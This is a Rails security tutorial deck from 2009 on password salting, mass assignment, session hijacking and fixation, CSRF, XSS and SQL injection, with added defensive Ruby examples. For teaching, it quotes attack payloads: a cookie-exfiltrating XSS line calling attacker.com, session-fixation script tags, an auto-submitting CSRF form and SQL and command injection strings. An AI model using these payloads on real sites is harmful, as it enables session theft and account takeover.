Defending Against Attacks With Rails

Let's face it, the web can be a dangerous place. So how do you protect your users and yourself? Tony Amoyal answers that and more as he shows how Rails can help protect against miscreants.

1. Defending Against Attacks With Rails
- Tony Amoyal
- Web Application Consultant
- www.tonyamoyal.com
- July 14, 2009
2. General Principles
- Kerckhoffs's Principle: always assume the method of security is known
- Always validate on the server side, even if you validate on the client side
- Whitelist, don't blacklist

3. Authentication
- Step 1: one-way hash all passwords
- MD5 -> 128-bit hash values (2^128 tries)
- SHA-1 -> 160-bit hash values (2^160 tries)
- Secure?

4. Why isn't hashing enough?
- The same password always hashes to the same value
- -> An attacker can easily determine if multiple users have the same password
- Very weak against a rainbow table attack

5. Use Salt
- Ensures the same password will hash to different values
- Rainbow tables are useless: the attacker would essentially have to compute a new rainbow table for each salt
6. People Use Crappy Passwords
- 20 common passwords from the MySpace phishing attack:
- password1, abc123, myspace1, password, blink182, qwerty1, ****you, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1, monkey
- (http://www.schneier.com/blog/archives/2006/12/realworld_passw.html)

7. Restful Authentication
- Great way to implement authentication in Rails
- Easy setup with hashes and salts
- Extra protection for crappy passwords with SITE_KEY and stretching
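Added example (my own code, not the slides' or restful_authentication's): plain SHA-1 from slide 3 beside a salted, stretched digest in the style slide 7 describes, with a site-wide key folded into every round. SITE_KEY, STRETCHES and the sample passwords are constructed stand-ins for restful_authentication's REST_AUTH_SITE_KEY and REST_AUTH_DIGEST_STRETCHES settings.

```ruby
require 'digest/sha1'
require 'securerandom'

# Constructed values: a real site key must stay out of version control.
SITE_KEY  = 'constructed-site-key-keep-this-out-of-version-control'
STRETCHES = 10

# Slide 3: bare SHA-1. Two users with the same password get the same digest,
# and one precomputed (rainbow) table of common passwords cracks both at once.
def plain_digest(password)
  Digest::SHA1.hexdigest(password)
end

def new_salt
  SecureRandom.hex(20)   # 40 hex characters, fresh for every user
end

# Slides 5 and 7: per-user salt plus a site-wide key, hashed repeatedly.
# Each round feeds the previous digest back in, so every guess costs the
# attacker STRETCHES hashes and any table has to be rebuilt per salt.
def stretched_digest(password, salt)
  digest = SITE_KEY
  STRETCHES.times do
    digest = Digest::SHA1.hexdigest([digest, salt, password, SITE_KEY].join('--'))
  end
  digest
end

# Store only the salt and the digest; the password itself is never kept.
def create_credential(password)
  salt = new_salt
  { salt: salt, digest: stretched_digest(password, salt) }
end

# Recompute with the stored salt and compare.
def authenticate?(credential, candidate)
  stretched_digest(candidate, credential[:salt]) == credential[:digest]
end

if __FILE__ == $0
  alice = create_credential('password1')   # one of the MySpace top 20
  bob   = create_credential('password1')
  puts "plain SHA-1 identical for both users? #{plain_digest('password1') == plain_digest('password1')}"
  puts "salted digests identical? #{alice[:digest] == bob[:digest]}"
  puts "alice logs in with the right password: #{authenticate?(alice, 'password1')}"
  puts "alice logs in with abc123: #{authenticate?(alice, 'abc123')}"
end
```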
8. What Else Can We Do?
- It is difficult to protect accounts with bad passwords
- Always provide a password strength meter
- Maybe only accept passwords at a certain strength level

9. Mass Assignment
- Rails lets us do stuff like…
- Not secure if we have attributes like is_admin, because an attacker can POST with…

10. Solve By Whitelisting
- For the previous example, whitelist with attr_accessible
- Can also use attr_protected to blacklist
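Added example, not the slides' or ActiveRecord's code: a plain Ruby stand-in for a Rails 2 model that sets attributes from a params hash, once unprotected and once through an attr_accessible-style whitelist. The User class, its columns and the sign-up POST body are all constructed.

```ruby
# Constructed stand-in for a Rails 2 model (not ActiveRecord).
class User
  ATTRIBUTES = [:name, :email, :is_admin]
  ACCESSIBLE = [:name, :email]   # the whitelist, like attr_accessible :name, :email
  attr_reader(*ATTRIBUTES)

  def initialize
    @is_admin = false            # only an administrator should ever flip this
  end

  # Unprotected mass assignment: every submitted key that names a column is set.
  # This is what User.new(params[:user]) does without attr_accessible.
  def assign_all(params)
    params.each do |key, value|
      instance_variable_set("@#{key}", value) if ATTRIBUTES.include?(key.to_sym)
    end
    self
  end

  # Whitelisted mass assignment: keys outside ACCESSIBLE are dropped and logged,
  # which is how Rails treats attributes not listed in attr_accessible.
  def assign_accessible(params)
    rejected = params.keys.reject { |k| ACCESSIBLE.include?(k.to_sym) }
    warn "ignored protected attributes: #{rejected.join(', ')}" unless rejected.empty?
    assign_all(params.select { |k, _| ACCESSIBLE.include?(k.to_sym) })
  end
end

# Constructed sign-up POST body: the client added an is_admin field the form never had.
SIGNUP_PARAMS = { 'name' => 'mallory', 'email' => 'mallory@example.com', 'is_admin' => true }

if __FILE__ == $0
  p User.new.assign_all(SIGNUP_PARAMS).is_admin          # true: the client granted itself admin
  p User.new.assign_accessible(SIGNUP_PARAMS).is_admin   # false: is_admin was not whitelisted
end
```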
11. Accessing Records

12. Logging
- Tell Rails not to log sensitive data

13. Security Through Obscurity?
- My default server response header:
- "Apache/2.2.11 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8g DAV/2 PHP/5.3.0 Phusion_Passenger/2.2.2"
- Add this to your Apache conf:
- ServerTokens Prod
- -> New server response header:
- "Apache"

14. More Obscurity?
- Turn your server signature off
- Add this to the bottom of your Apache conf:
- ServerSignature Off
15. Stack Traces
- Rails handles this, but it is good to know about
- config/environments/development.rb
- config/environments/production.rb
- Want the production error message in development? In the application controller:

16. Time For The Scary Stuff...

17. Session Hijacking
- How does it work?
- Session IDs are stored on client machines
1) Attacker gets the SID from an authenticated user
2) Attacker presents the SID to the web app as his own

18. How Does the Attacker Get the SID?
1) Guess the session ID
2) Network sniffing
3) Finding cookies on a shared computer
4) Cross-site scripting (more on this later)
5) Session fixation (more on this later)

19. Guessing the Session ID
- Rails makes this very difficult by making session IDs very random
- SIDs are hashes of a string containing:
- the current time
- a random number between 0 and 1
- the PID of the Ruby interpreter (another random number)
- a constant string

20. Sniffing the Session ID
- Possible on an unencrypted wireless LAN (internet cafe)
- Solution: provide an SSL connection

21. Shared Computer Problem
- Consider public computers
- Solution: provide a logout button to clear the session
- Good example, Bank of America: provides a low session expiration time with a pop-up warning

22. Cookie Security
- Rails uses CookieStore by default as of v2.2
- Can users tamper with the cookies?
- Only if they have the secret key: config/environment.rb
23. Cookie Precautions
- Don't store in the session:
- Sensitive data: cookie data is not encrypted, it is base64 encoded! -> clients can read cookies
- Transient data (account balance): vulnerable to a replay attack... see next slide
- Use a long secret key: 128 characters

24. What is a Replay Attack?
- When a client presents an old cookie that is still valid and convinces the server that it is current
- Use a nonce? ...probably overkill (if not, use memcached?)
- Best solution: don't keep transient data that is sensitive (account balance) in the session
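Added example (my own code, not the slides' or Rails'): it rebuilds the shape of a Rails 2.2 CookieStore cookie, base64 of a Marshal dump followed by "--" and an HMAC-SHA1, so the claims on slides 22 to 24 can be checked: anyone can read the session, nobody can change it without the secret, and an old signed cookie still verifies. SECRET and the session contents are constructed; the secret is 128 characters as slide 23 recommends.

```ruby
require 'base64'
require 'openssl'

# Constructed stand-in for config.action_controller.session[:secret] (128 chars).
SECRET = 'constructed-secret-' + ('x' * 109)

def sign(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), secret, data)
end

# Server side: serialise the session, base64 it, append an HMAC over the base64.
def build_cookie(session, secret)
  data = Base64.strict_encode64(Marshal.dump(session))
  "#{data}--#{sign(data, secret)}"
end

# Slide 23: no secret is needed to read the cookie, only to change it.
def read_without_secret(cookie)
  data, _sig = cookie.split('--', 2)
  Marshal.load(Base64.strict_decode64(data))
end

# Compare two strings without leaking where they first differ.
def same_string?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side: check the signature first, unmarshal only if it matches.
def load_cookie(cookie, secret)
  data, sig = cookie.split('--', 2)
  return nil if data.nil? || sig.nil?
  return nil unless same_string?(sign(data, secret), sig)
  Marshal.load(Base64.strict_decode64(data))
end

# A client editing its own session and reusing the old signature (constructed test input).
def edited_cookie(cookie, changes)
  session = read_without_secret(cookie)
  _data, sig = cookie.split('--', 2)
  "#{Base64.strict_encode64(Marshal.dump(session.merge(changes)))}--#{sig}"
end

if __FILE__ == $0
  older = build_cookie({ 'user_id' => 42, 'balance' => 100 }, SECRET)
  newer = build_cookie({ 'user_id' => 42, 'balance' => 0 }, SECRET)
  p read_without_secret(older)                                      # readable by anyone
  p load_cookie(edited_cookie(older, 'balance' => 10**6), SECRET)   # nil: tampering detected
  p load_cookie(older, SECRET)                                      # slide 24: old cookie still verifies
  p load_cookie(newer, SECRET)
end
```

The last two lines are the replay problem from slide 24: the server cannot tell the stale balance from the current one, which is why transient data belongs in the database, not the session.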
25. Session Fixation
1) Attacker gets a valid session
2) Attacker forces his victim to use that valid session
- Now the attacker has access to the victim's session

26. Good Example from Wikipedia
- Given:
- Alice has a bank account at http://un.safe.ly
- Mallory wants Alice's money
- Alice has a reasonable amount of trust in Mallory

27. The Attack
1) Mallory knows that http://un.safe.ly accepts SIDs from query strings
2) Mallory sends Alice an email: "Check out this new cool bank feature http://un.safe.ly/?SID=GOTCHA"
3) Alice visits the link and logs in
4) Mallory visits the link and has access to Alice's account

28. Other Attacks
- You can also use XSS to set a victim's session ID:
- <script>document.cookie="_session_id=PUT_SID_HERE";</script>
- OR
- <meta http-equiv=Set-Cookie content="_session_id=PUT_SID_HERE">

29. Fixation Mitigation
- In Rails, one line of code: reset_session
- In the last example, Alice's session would have been reset upon login
- The tradeoff? Forms will expire
- (read more: vendor/plugins/restful_authentication/notes/Tradeoffs.txt)

30. Restful Authentication Example
- app/controllers/sessions_controller.rb
- Read about the tradeoffs: plugins/restful_authentication/notes/Tradeoffs.txt
31. Cross-Site Request Forgery
- What is it?
- Let's start with a great example from the Rails Guides

32. CSRF Example
1) Attacker posts on a message board: <img src="http://www.webapp.com/project/1/destroy">
2) Bob recently used webapp.com, session still alive
3) Bob visits the message board
4) Browser loads the image, sending the cookie from Bob's machine
5) webapp verifies the cookie credentials and destroys the project with ID=1
6) No image displayed on the forum

33. CSRF Mitigation
1) Require POST methods where applicable
- config/routes.rb
- app/controllers/projects_controller.rb
- Still not secure: POST requests can be sent automatically on events

34. Automatic POST Request
- <a href="http://www.harmless.com/" onclick="var f = document.createElement('form'); f.style.display = 'none'; this.parentNode.appendChild(f); f.method = 'POST'; f.action = 'http://www.example.com/account/destroy'; f.submit(); return false;">To the harmless survey</a>
- OR
- <img src="http://www.harmless.com/img" width="400" height="400" onmouseover="..." />

35. Another Security Measure
2) Add a security token in forms
- Rails automatically includes security tokens in forms
- app/controllers/application_controller.rb
- Use a secret if not using the CookieStore

36. Cross-Site Scripting (XSS)
- Most common
- Most devastating
- 510,000 attacks in April 2008

37. The XSS Attack
1) Attacker visits the website and injects some code through a web form or other means
2) Web application saves the injected code and displays it later to a victim

38. The Possibilities
- Steal cookies
- Hijack sessions
- Redirect the victim to a malicious website
- Display advertisements to benefit the attacker
- Change elements on the website to get credentials
- Install malware through browser security holes

39. XSS Example
- Getting cookie information:
- <script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
- OR
- <img src=javascript:document.write('<img src="http://www.attacker.com/' + document.cookie + '">')>
- OR
- <table background="...">
- Now the attacker checks his server logs

40. Get User Credentials
- Use an iframe to present a form to be submitted to your server:
- <iframe name="LoginForm" src="http://58.xx.xxx.xxx"></iframe>

41. XSS Mitigation
1) Whitelist input filtering
- Good reference: http://apidock.com/rails/ActionView/Helpers/SanitizeHelper/sanitize
2) Escape all output of your application
- In your views: <%=h user_input %> # done by default in Rails 3

42. SQL Injection
- An attack that manipulates the SQL queries performed by a web application on its database.
43. SQL Injection Example
- Given: my application has Reminder objects which belong to Band objects
- Reminder.find(:all, :conditions => "band_name = '#{band_name}'")
- What if an attacker enters for their band_name: ' OR 1=1 OR '
- Resulting SQL: SELECT * FROM `reminders` WHERE (band_name = '' OR 1=1 OR '')

44. SQL Injection Mitigation
- In Rails use: Reminder.find(:all, :conditions => ["band_name = ?", band_name])
- Resulting SQL: SELECT * FROM `reminders` WHERE (band_name = '\' OR 1=1 OR \'')
- ', ", NULL, and line breaks are escaped -> the query returns nothing

45. But Obviously...
- Do this: @reminders = @band.reminders
- The previous tip works great for complicated custom queries
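Added example, not the slides' or ActiveRecord's code: a small stand-in for the bind-variable substitution behind the ["band_name = ?", value] form on slide 44, using MySQL-style backslash escaping, so the interpolated query from slide 43 and the bound one can be produced side by side from the same input. The quoting rules, table and function names are my assumptions, modelled on what the slides show.

```ruby
# Characters a MySQL adapter escapes inside a quoted string literal.
ESCAPES = { "\\" => "\\\\", "'" => "\\'", '"' => '\\"', "\n" => "\\n", "\r" => "\\r", "\0" => "\\0" }

# Quote one value: strings are escaped and wrapped in single quotes,
# nil becomes NULL, numbers pass through unquoted.
def quote(value)
  case value
  when nil     then 'NULL'
  when Numeric then value.to_s
  else "'" + value.to_s.gsub(/[\\'"\n\r\x00]/) { |ch| ESCAPES[ch] } + "'"
  end
end

# Replace each ? in the template with the corresponding quoted value.
# gsub scans only the original template, so a ? inside a quoted value is never
# treated as a placeholder; a count mismatch raises rather than silently binding.
def sanitize_sql(condition_array)
  template, *values = condition_array
  raise ArgumentError, 'wrong number of bind variables' unless template.count('?') == values.size
  remaining = values.dup
  template.gsub('?') { quote(remaining.shift) }
end

def reminders_sql(where)
  "SELECT * FROM `reminders` WHERE (#{where})"
end

# Slide 43: string interpolation, attacker-controlled input lands in the query unchanged.
def interpolated_query(band_name)
  reminders_sql("band_name = '#{band_name}'")
end

# Slide 44: bind variable, the quotes are escaped so the input stays one literal.
def bound_query(band_name)
  reminders_sql(sanitize_sql(['band_name = ?', band_name]))
end

if __FILE__ == $0
  evil = "' OR 1=1 OR '"          # the slide's input
  puts interpolated_query(evil)   # ... WHERE (band_name = '' OR 1=1 OR '')   -> every row
  puts bound_query(evil)          # ... WHERE (band_name = '\' OR 1=1 OR \'') -> no row
end
```

For the common case, slide 45 still applies: @band.reminders lets ActiveRecord build the query and never touches a string at all.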
46. Other Injections
1) Ajax
- Returning a string in an Ajax call? Escape it in the controller
2) RJS
- escape_javascript() within JS and h() within HTML
3) CSS
- Some browsers allow HTML/JS in CSS:
- <div id="abc" expr="alert('!!!')" style="background:url('javascript:eval(document.all.abc.expr)')">
- ...works just like HTML/JS injection

47. More Injections
4) Textile
- Use whitelist filtering!
- RedCloth.new("<a href='javascript:alert(1)'>hello</a>", [:filter_html]).to_html
- # => "<p><a href=\"javascript:alert(1)\">hello</a></p>"
- (:filter_html leaves the javascript: link in place, so run the output through a whitelist filter as well)
5) Command Line
- system("/bin/echo", "hello; rm *")
- # prints "hello; rm *" and does not delete files

48. Even More Injections
6) Header
- Escape referer, user-agent, cookie, etc. if you display these headers on a page
- Be aware of how you build headers, because injections can rewrite headers and inject arbitrary headers (up to Rails 2.1.2)
- More in the Rails Guides, section 8.9
7) Encoding
- The browser understands the encoding, but your app does not, so the sanitize method is useless against it

49. Regular Expressions
- Use \A and \z, not ^ and $
- The problem?
- file.txt%0A<script>alert('hello')</script>
- passes the test because %0A is a newline and ^ and $ match at line boundaries
- Result: "file.txt\n<script>alert('hello')</script>"

50. Whitelist, Don't Blacklist
- before_filter :only => [...] instead of before_filter :except => [...]
- Use attr_accessible instead of attr_protected
- Only allow certain tags when stripping instead of allowing all tags except some
- Don't try to correct user input
- This will make the attack work: "<sc<script>ript>".gsub("<script>", "")
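Added example (my own code, not the slides'): the two inputs from slides 49 and 50 run through the checks those slides warn against and through their whitelist counterparts, with the output escaping from slide 41 as the fallback that needs no guessing about input. The filename pattern and the sample inputs are constructed.

```ruby
require 'cgi'

# Constructed inputs.
SAFE_NAME   = 'file.txt'
SNEAKY_NAME = "file.txt\n<script>alert('hello')</script>"   # %0A in the URL decodes to this newline
NESTED_TAGS = '<sc<script>ript>'

# Slide 49: in Ruby, ^ and $ match at every line boundary, so the first line
# "file.txt" satisfies the pattern and the script on line two rides along.
def valid_filename_lines?(name)
  !!(name =~ /^[\w.\-]+$/)
end

# \A and \z anchor to the start and the very end of the whole string
# (\Z would still allow a trailing newline, so \z is the one to use).
def valid_filename_string?(name)
  !!(name =~ /\A[\w.\-]+\z/)
end

# Slide 50: a blacklist that deletes "<script>" once assembles a new "<script>"
# from the pieces around it. Correcting input is a losing game.
def blacklist_strip(input)
  input.gsub('<script>', '')
end

# Slide 41: leave the input alone and escape it on output, which is what h()
# does in a Rails 2 view and what Rails 3 does by default.
def escape_output(input)
  CGI.escapeHTML(input)
end

if __FILE__ == $0
  p valid_filename_lines?(SNEAKY_NAME)    # true:  ^ and $ are fooled by the newline
  p valid_filename_string?(SNEAKY_NAME)   # false: \A and \z are not
  p blacklist_strip(NESTED_TAGS)          # "<script>": the blacklist built the tag
  p escape_output(NESTED_TAGS)            # "&lt;sc&lt;script&gt;ript&gt;": inert as text
end
```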
51. Some Links
- http://guides.rubyonrails.org/security.html
- http://en.wikipedia.org/wiki/Session_fixation
- http://www.rorsecurity.info/journal/2007/4/15/session-fixation-in-rails.html
- http://github.com/technoweenie/restful-authentication/
- http://www.matasano.com/log/958/enough-with-the-rainbow-tables-what-you-need-to-know-about-secure-password-schemes/
- My Blog: www.tonyamoyal.com